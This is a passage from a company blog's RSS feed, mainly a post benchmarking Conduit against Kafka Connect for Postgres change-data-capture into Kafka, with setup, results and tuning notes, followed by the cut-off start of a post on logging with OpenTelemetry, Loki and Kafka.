&lt;p&gt;If you’re already on Kafka and tired of throwing money at JVM tuning problems, &lt;a href=&quot;https://conduit.io/&quot;&gt;Conduit&lt;/a&gt; is ready for you.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;✅ Drop-in connectors&lt;/li&gt;
&lt;li&gt;✅ Fast restarts&lt;/li&gt;
&lt;li&gt;✅ Low memory utilization&lt;/li&gt;
&lt;li&gt;✅ Built for streaming&lt;/li&gt;
&lt;li&gt;and &lt;a href=&quot;https://www.notion.so/Conduit-Embedded-API-PRD-193378e702b7807f8015d746ce0f9218?pvs=21&quot;&gt;many more features&lt;/a&gt; to help you stream data&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Hot take? Maybe. True? Absolutely.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://conduit.io/&quot;&gt;Give Conduit a spin →&lt;/a&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Postgres CDC Showdown: Conduit Crushes Kafka Connect]]></title><description><![CDATA[As we’re getting closer to the Conduit 1.0 release, we recently started conducting a series of benchmarks on our most popular connectors. We started with MongoDB and Kafka. In this post we'll talk about our performance findings for Postgres.]]></description><link>https://meroxa.com/blog/postgres-cdc-showdown-conduit-crushes-kafka-connect</link><guid isPermaLink="false">https://meroxa.com/blog/postgres-cdc-showdown-conduit-crushes-kafka-connect</guid><dc:creator><![CDATA[Raúl Barroso]]></dc:creator><pubDate>Fri, 16 May 2025 12:22:00 GMT</pubDate><content:encoded>&lt;h2&gt;Introduction&lt;/h2&gt;
&lt;p&gt;As we’re getting closer to the Conduit 1.0 release, we recently started conducting a series of benchmarks on our most popular connectors. We started with &lt;a href=&quot;https://meroxa.com/blog/conduit-makes-mongodb-cdc-52percent-faster-than-kafka-connect/&quot;&gt;MongoDB and Kafka&lt;/a&gt;, and in this case, we were eager to run some tests using one of our &lt;a href=&quot;https://conduit.io/docs/core-concepts#built-in-connector&quot;&gt;built-in connectors&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;More particularly, we wanted to put Conduit to the test, head-to-head against Kafka Connect, moving data from Postgres to Kafka. Our goal was to see just how much performance we could squeeze out of Conduit while still maintaining a reasonable usage of resources.&lt;/p&gt;
&lt;p&gt;The results were very promising. &lt;strong&gt;Conduit moved data faster than Kafka Connect&lt;/strong&gt; in both CDC and snapshot operations, and did it while using dramatically less memory in some cases, over 98% less. In this post, we’ll break down how we ran the tests, share the numbers, and show where Conduit really shines.&lt;/p&gt;
&lt;h2&gt;Methodology&lt;/h2&gt;
&lt;h3&gt;Performance Measurement&lt;/h3&gt;
&lt;p&gt;To ensure consistency and accuracy, we used our own recently launched benchmarking tool, &lt;a href=&quot;https://conduit.io/changelog/2025-03-20-benchi-announcement&quot;&gt;Benchi&lt;/a&gt;. Benchi collects throughput data using Conduit’s built-in metrics and Kafka’s JMX metrics, while CPU and memory usage is monitored through Docker runtime stats. This setup lets us compare both tools under identical, automated conditions using the following metrics:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Message Throughput&lt;/strong&gt; (messages per second)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;CPU Utilization&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Memory Usage&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;Snapshots vs CDC&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Snapshot and CDC workloads have different performance profiles, so we made sure to configure them accordingly. Thankfully, Benchi allows us to do that very easily. The main differences in the setup were:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Snapshot&lt;/strong&gt;: All test data is loaded, and only once that is done, the pipeline starts running.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;CDC:&lt;/strong&gt; Streaming is started and paused, data is inserted, then streaming resumes, forcing the pipeline into CDC mode.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The following setup ensured both tools processed the same data under the same conditions, depending on the mode (CDC or Snapshot).&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Setup&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;All benchmarks ran on a t2.xlarge AWS EC2 instance (4 vCPUs, 16 GB RAM, 120 GB gp3 EBS volume). Kafka and Postgres ran in Docker containers, with a single Kafka broker and Postgres instance. While we did try different EC2 instances, we decided to go with a t2.xlarge considering it had reasonable capacity to give Kafka Connect a fair chance. For Conduit, you can certainly run your pipelines in a much more constrained environment, massively reducing your cost.&lt;/p&gt;
&lt;p&gt;The amount of data we inserted into the Postgres instance for each test was 20 million records with the following schema:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;CREATE&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;TABLE&lt;/span&gt; employees &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
    id &lt;span class=&quot;token keyword&quot;&gt;INT&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;NOT&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;NULL&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    name &lt;span class=&quot;token keyword&quot;&gt;VARCHAR&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;255&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    email &lt;span class=&quot;token keyword&quot;&gt;VARCHAR&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;255&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    full_time &lt;span class=&quot;token keyword&quot;&gt;BOOLEAN&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;NOT&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;NULL&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;DEFAULT&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;TRUE&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    position &lt;span class=&quot;token keyword&quot;&gt;VARCHAR&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;100&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    hire_date &lt;span class=&quot;token keyword&quot;&gt;DATE&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;NOT&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;NULL&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    salary &lt;span class=&quot;token keyword&quot;&gt;REAL&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;CHECK&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;salary &lt;span class=&quot;token operator&quot;&gt;&gt;=&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    updated_at TIMESTAMPTZ &lt;span class=&quot;token keyword&quot;&gt;DEFAULT&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;NOW&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    created_at TIMESTAMPTZ &lt;span class=&quot;token keyword&quot;&gt;DEFAULT&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;NOW&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;PRIMARY&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;KEY&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;id&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Conduit&lt;/h3&gt;
&lt;p&gt;We chose the latest Conduit released version v0.13.4 with the Postgres connector, using the &lt;a href=&quot;https://meroxa.com/blog/optimizing-conduit-5x-the-throughput/&quot;&gt;new pipeline engine&lt;/a&gt;.  Pipelines used &lt;code class=&quot;language-text&quot;&gt;⁠initial_only&lt;/code&gt; for snapshots and ⁠ &lt;code class=&quot;language-text&quot;&gt;logrepl&lt;/code&gt; with logical replication slots for CDC.&lt;/p&gt;
&lt;h3&gt;Kafka Connect&lt;/h3&gt;
&lt;p&gt;We ran Kafka Connect v7.8.1 with Debezium Postgres connector. Default worker settings, 10 GB heap (⁠&lt;code class=&quot;language-text&quot;&gt;KAFKA_HEAP_OPTS: &quot;-Xms10G -Xmx10G&quot;&lt;/code&gt;), and tuned batch/queue sizes.&lt;/p&gt;
&lt;p&gt;Full configurations are &lt;a href=&quot;https://github.com/ConduitIO/streaming-benchmarks/blob/main/benchmarks/postgres-kafka-cdc/kafka-connect/data/connector.json&quot;&gt;here&lt;/a&gt; and &lt;a href=&quot;https://github.com/ConduitIO/streaming-benchmarks/blob/main/benchmarks/postgres-kafka-snapshot/kafka-connect/data/connector.json&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Running the Benchmarks&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;To reproduce these results, you can simply run your own EC2 instance and follow these steps:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell&quot;&gt;&lt;pre class=&quot;language-shell&quot;&gt;&lt;code class=&quot;language-shell&quot;&gt;&lt;span class=&quot;token function&quot;&gt;curl&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-L&lt;/span&gt; https://github.com/ConduitIO/streaming-benchmarks/archive/refs/heads/main.zip &lt;span class=&quot;token parameter variable&quot;&gt;-o&lt;/span&gt; streaming-benchmarks.zip
&lt;span class=&quot;token function&quot;&gt;unzip&lt;/span&gt; streaming-benchmarks.zip
&lt;span class=&quot;token builtin class-name&quot;&gt;cd&lt;/span&gt; streaming-benchmarks-main &lt;span class=&quot;token operator&quot;&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;make&lt;/span&gt; install-tools
&lt;span class=&quot;token function&quot;&gt;make&lt;/span&gt; run-postgres-kafka-cdc
&lt;span class=&quot;token function&quot;&gt;make&lt;/span&gt; run-postgres-kafka-snapshot&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h2&gt;&lt;strong&gt;Results&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Here’s how Conduit and Kafka Connect compare in both modes:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Mode&lt;/th&gt;
&lt;th&gt;Tool&lt;/th&gt;
&lt;th&gt;Message Rate (msg/s)&lt;/th&gt;
&lt;th&gt;CPU (%)&lt;/th&gt;
&lt;th&gt;Memory (MB)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;CDC&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Conduit&lt;/td&gt;
&lt;td&gt;48.060&lt;/td&gt;
&lt;td&gt;110,2&lt;/td&gt;
&lt;td&gt;110,2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;Kafka Connect&lt;/td&gt;
&lt;td&gt;44.889&lt;/td&gt;
&lt;td&gt;147,1&lt;/td&gt;
&lt;td&gt;6.863&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Snapshot&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Conduit&lt;/td&gt;
&lt;td&gt;70.753&lt;/td&gt;
&lt;td&gt;231,0&lt;/td&gt;
&lt;td&gt;2.234&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;Kafka Connect&lt;/td&gt;
&lt;td&gt;68.783&lt;/td&gt;
&lt;td&gt;184,2&lt;/td&gt;
&lt;td&gt;2.729&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;In CDC mode, Conduit&apos;s combination of higher throughput and significantly lower memory usage makes the biggest difference. We called this a huge win since we consider that pipelines typically spend most of their time in CDC. Having this efficiency directly impacts day-to-day operations and can immensely reduce the cost of your infrastructure or simply expand the options for where you can run your pipelines.&lt;/p&gt;
&lt;p&gt;For snapshots, the throughput gap ended up being smaller, though Conduit was still leading. In this case, memory consumption was still lower than Kafka Connect, but with higher CPU usage.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Charts&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/6ebee5a8524d159be37ad50c2e34f357/69476/cpu-usage.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 85.50000000000001%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAARCAYAAADdRIy+AAAACXBIWXMAAAsTAAALEwEAmpwYAAACTElEQVR42qWUy2vUUBTG+69IwY1CUUZ0JbSoCC7VlQt36taFCNpB7AOp4sIHtj5AKC50VVFXoiKI0HbALnxMy2Se5jHJJPNKOpN7b5LPe2cmM0kd1NYDlwPJze9+3z3nZMTzPOL7PqIRBEEna5qGdDoN0zRRKBSgKDJkWYbY3tsSht/7rjTSarVIrVbDsBAgSZJQLBaRSqWQzeWgKkr/wKFAngmHgivFnyJklOsB5t+5+PrTiz4fACmlpFqtYqvt0LpY4h3zxPsAq1mG0YtNLH4inT2evwVIeFiWNRQY89RTuFbwsH/SxvPPLtA0QBvNnVkOgV/yDPuuETx7rUA7noB6+0Yc6Lou0XU9dtHCBuOZGWWQbAYBYwj194GvZKjje6DOTf2Dwp59bfoKNg6PgepldI8LIkAF6sReqDen40B+d6TRaMTucF2h+G5x4EwSmfEE2HaAosqi33x/YPnsAwcn7gHqzCSkicT2FIaWWcTy+UcOTi3sEChGr1KpxBSe48CTC/+h0LbtWFEuPHFw+iGgzCaRPXoQ1ND7wDUOTFwXbcOrfGQM6q3Zv1s+c9/BsTscmLyEjQO7QcsqwglblShGLxM8XZKhHdoFZerq71V2HAfRtbTi4MXyJuQ3L2EuPuYDocOhjB9KUDLamH/fxsflPEp352B8eAun3fYZpWCMdRVG5zZs8JzaQk7RYLtuRx3TFNRLBTT49bRtE/lcBpazyYfAR9hzPA2A0RCTsiJ5MMwaLK5OBM2sw/zxDUa1hkrFRL07w+Hvpm/5Fwom4JEqahI2AAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;cpu usage&quot;
        title=&quot;&quot;
        src=&quot;/static/6ebee5a8524d159be37ad50c2e34f357/5a190/cpu-usage.png&quot;
        srcset=&quot;/static/6ebee5a8524d159be37ad50c2e34f357/772e8/cpu-usage.png 200w,
/static/6ebee5a8524d159be37ad50c2e34f357/e17e5/cpu-usage.png 400w,
/static/6ebee5a8524d159be37ad50c2e34f357/5a190/cpu-usage.png 800w,
/static/6ebee5a8524d159be37ad50c2e34f357/69476/cpu-usage.png 926w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/951aebd6b09f023545bdd982d14638b1/36c33/memory-usage.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 87.5%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAASCAYAAABb0P4QAAAACXBIWXMAAAsTAAALEwEAmpwYAAACCklEQVR42s2Uz2vUQBTH81+IdwUR8aLSigcv6p/hxYN6tB71JggexJugHkSpIBVEFMSTmqJLoOCvVdJuo9SNje42vycz2WQm+3UmWbc2TdcfFx2YJMx77/Pey3vzNExYIs+xatuw5Y7jGGEYwnVdWJaFNE2bTIiWS6PhcNgI5KLAO3MRhmHANE20Wi20223ouo4gCEqdmi3RPM8DIWT9aKRQpAzB3CzS1vyG818sonHOG4HcXcPS9G50z5ysHEi9oijGe4usiNbr9cp/Mw5/pCh8F8vHDsI5f7aSSchvRaieSZJsilB4EnhkCs65mX8MVEWJomhzyn8LZIyVPfb/pvynQMEF1FesP0X31HGk5vuf7Sa0TQ1YiAp4+znDibvA4rWb6OzaBvJCr4CVQ6JlWdbY2FsBL96n2H8JaN+4g49TO0GMlyO7YnLKXAKto9OysTcCLz+kOHwF+HB9Fp8O7EBSB6o0VZXVdRJCIMs4wkw6+drH0qG9+DxzGspFlg6UG1y4F2GfivDqLVh7tiOcf1bK1dUsgQqiIqSUgjEKL6TofONYWXHQe/II5O1rUDmqWM7B8wFMO8PjNxTLxgKcB3NIVr9I+eDHOKtSrmWLSMoM08daHEpQXp7RVwvwZAFTliDo2+hKEJPBNLbNGDh6RxToODnicH20Mdkefr8PPwjheT5UMZVFfR5+B2IsSuYJ3g4kAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;memory usage&quot;
        title=&quot;&quot;
        src=&quot;/static/951aebd6b09f023545bdd982d14638b1/5a190/memory-usage.png&quot;
        srcset=&quot;/static/951aebd6b09f023545bdd982d14638b1/772e8/memory-usage.png 200w,
/static/951aebd6b09f023545bdd982d14638b1/e17e5/memory-usage.png 400w,
/static/951aebd6b09f023545bdd982d14638b1/5a190/memory-usage.png 800w,
/static/951aebd6b09f023545bdd982d14638b1/36c33/memory-usage.png 946w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/bd85f9b87cc344f493683345189a33e9/d9199/message-throughput.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 83%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAARCAYAAADdRIy+AAAACXBIWXMAAAsTAAALEwEAmpwYAAACX0lEQVR42q2Uy2sTURTG+48ILkU3RRHUUl8gilsRi266kboR/4T4qIIi6MqqDYK4MqZ1IUWqCXUTE0kk5FFMkU6nWaTJPJxJ5s4kkzszn/dOJzEvbBAP3Hndub/5vjPnngnXdanjOODheZ5/liQJsixD13VomgZVVf1rRVH8+97RWRMEnSCE0EqlAgbuTpZKJaTTaSSTSWSzWRSLRWQyGSQSCeTzeZR+rCOV+opCLgcvENMF8oNt22g2mxgn+Ddtx4PjjZzeBbbb7T4gV8oVDw42A6Xh4NJTE09WTJCFh5DfvOoHmqZJy+UyWq1W9ylfS50gp8HopEqquzh+20QoYmLn4lEIszPDChl0pGUO5DnyeoByw8XpeRP3lkxI1y5AvDW3t2Wh5iJepKhbuxQvyF0HeIoB70YZcOYcxJvX+4EMRnmJcMtusOjZqoXJOw6+RdZQm7sC8j3dSca/ARdjFqYeA6nnEQiT+1CPrQbvO3sDey13gC8/WzjxiAHD7yFOH0T9S3x8hZQFr/hehV3g4jLEqQOor8XGBzIQrVar/w84ynI4bmGa5zC8jO2Th9AYsHz2gYn5JQLp6nls/61sOsAF9pcP3weSL6LYOrIfevxTUJgUNd3BsRBB6J0F5fIZiDdmh4HcLmsSMAwCu0mQEwg+FtrYSGagfYjCEAWQNoVN22iQFlayLcQzOxDevobE1JuW5a/nFeMDBzc/j7LiorBZhaz9Au8nrixBXy+wew2krqIsbrJ9bTBX3rDCUcAtyUNFacLQVFDeLFQFxs8NaMyFrjdgMEUeb3l+0/gD/A0FJNlbZh9d+wAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;message throughput&quot;
        title=&quot;&quot;
        src=&quot;/static/bd85f9b87cc344f493683345189a33e9/5a190/message-throughput.png&quot;
        srcset=&quot;/static/bd85f9b87cc344f493683345189a33e9/772e8/message-throughput.png 200w,
/static/bd85f9b87cc344f493683345189a33e9/e17e5/message-throughput.png 400w,
/static/bd85f9b87cc344f493683345189a33e9/5a190/message-throughput.png 800w,
/static/bd85f9b87cc344f493683345189a33e9/d9199/message-throughput.png 960w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Key Findings&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;For &lt;a href=&quot;https://conduit.io/docs/using/other-features/schema-support&quot;&gt;Schema support&lt;/a&gt;, even though Conduit has the ability to maintain the schema on structured data through the pipeline, we decided to disable the schema extraction on the source as this was not necessarily needed, and we wanted to reduce the overhead. This can be accomplished by setting both &lt;code class=&quot;language-text&quot;&gt;sdk.schema.extract.key.enabled&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;sdk.schema.extract.payload.enabled&lt;/code&gt; to false in the source Postgres connector, and it had a direct impact on performance.&lt;/p&gt;
&lt;p&gt;Implementing a &lt;code class=&quot;language-text&quot;&gt;ReadN&lt;/code&gt; method (supported thanks to our &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-sdk&quot;&gt;Connector SDK&lt;/a&gt;), we were able to start reading multiple records at the same time, pulling batches of changes in a single operation. The implementation of this method in the source Postgres connector resulted in a &lt;strong&gt;7,2%&lt;/strong&gt; improvement on CDC and a &lt;strong&gt;2,4%&lt;/strong&gt; boost on Snapshot.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;CDC Mode&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Conduit delivered &lt;strong&gt;7% higher throughput&lt;/strong&gt; (48.060 msg/s vs. 44.889 msg/s) and used &lt;strong&gt;98% less memory&lt;/strong&gt; (110 MB vs. 6.863 MB). CPU usage was also &lt;strong&gt;25% lower&lt;/strong&gt; (110% vs. 147%).&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Snapshot Mode&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;When configuring the Postgres source, specifying your desired batch size via the connector configuration parameters &lt;code class=&quot;language-text&quot;&gt;snapshot.fetchSize&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;sdk.batch.size&lt;/code&gt; is relevant. The optimal value we came up with was 75000, though this number was purely experimental. For Conduit, we felt comfortable bumping up this number as memory consumption is clearly not an issue for it.&lt;/p&gt;
&lt;p&gt;In the end, throughput was &lt;strong&gt;3% higher&lt;/strong&gt; for Conduit (70.753 msg/s vs. 68.783 msg/s), with &lt;strong&gt;18% less memory&lt;/strong&gt; used (2.234 MB vs. 2.729 MB). However, CPU usage was &lt;strong&gt;25% higher&lt;/strong&gt; (231% vs. 184%).&lt;/p&gt;
&lt;h2&gt;Future improvements&lt;/h2&gt;
&lt;p&gt;We believe there is still potential to continue increasing speed by experimenting with different methods for moving data between goroutines. When we conducted tests using channels with various batch sizes and buffering strategies, we saw dramatic differences in performance depending on how data was grouped and transferred.&lt;/p&gt;
&lt;p&gt;For instance, sending 20 million objects one at a time over an unbuffered channel took around 5.5 seconds, while simply adding a buffer of size 50 brought that down to 1.8 seconds. The real breakthrough came when we increased the batch size to 1,000 or even 10,000—at that point, the total time dropped to just 80 ms, regardless of channel buffering.&lt;/p&gt;
&lt;p&gt;Based on these results, we definitely consider it worth exploring batch sending from the CDC and snapshot iterators. There is a good chance we can achieve even greater performance by sending records in groups rather than one at a time. Considering Conduit is JVM free, the only foreseeable future we anticipate for improvements is an even higher throughput without being concerned about our resource consumption. 🚀&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Let’s Chat!&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Curious about these benchmarks? Have ideas for new tests, or want to share your own results? Join us on &lt;a href=&quot;http://discord.meroxa.com/&quot;&gt;Discord&lt;/a&gt; or start a &lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions&quot;&gt;GitHub discussion&lt;/a&gt;.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Flexible Logging With OpenTelemetry, Loki and Kafka]]></title><description><![CDATA[We’ve recently launched a feature to allow customers to view the logs from the applications they are creating. This is a walk through of the architecture we designed to make it all work using Conduit, OpenTelemetry Collector, Loki and Kafka.]]></description><link>https://meroxa.com/blog/flexible-logging-with-opentelemetry-loki-and-kafka</link><guid isPermaLink="false">https://meroxa.com/blog/flexible-logging-with-opentelemetry-loki-and-kafka</guid><dc:creator><![CDATA[Nathan Stehr]]></dc:creator><pubDate>Wed, 14 May 2025 14:30:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;Application logs are one of those things we often take for granted. Quietly humming along in the background until something goes wrong at 3 a.m., and suddenly, they’re your best friend.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;As more customers build and run applications on our platform, access to logs and visibility into what’s happening under the hood has become one of our most frequent and important feature requests.&lt;/p&gt;
&lt;p&gt;We’ve recently launched the feature to allow customers to view the logs from the applications they are creating, and in this post, I’ll walk through the architecture we designed to make it all work using &lt;a href=&quot;https://conduit.io/&quot;&gt;Conduit&lt;/a&gt;, &lt;a href=&quot;https://opentelemetry.io/docs/collector/&quot;&gt;OpenTelemetry Collector&lt;/a&gt; &lt;a href=&quot;https://grafana.com/docs/loki/latest/&quot;&gt;Loki&lt;/a&gt; and &lt;a href=&quot;https://kafka.apache.org/&quot;&gt;Kafka&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;High Level Architecture&lt;/h2&gt;
&lt;p&gt;As a quick overview, our platform enables users to build and deploy data pipeline applications that move data between various sources and destinations. The data movement is powered by our open-source &lt;a href=&quot;https://conduit.io/&quot;&gt;Conduit&lt;/a&gt; solution. All this is running in Kubernetes.&lt;/p&gt;
&lt;p&gt;Our goal was to collect and expose both lifecycle logs and Conduit application logs to our customers. In addition to logs, we also wanted to surface relevant metrics. With this observability data in place, we felt that users would be equipped to quickly diagnose common issues such as misconfigurations or malformed URLs, as well as detect more elusive problems, such as connectivity disruptions or unexpected failures.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/8610669c8800bb415084cf5242effb8e/90eea/logging-high-level-arch.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
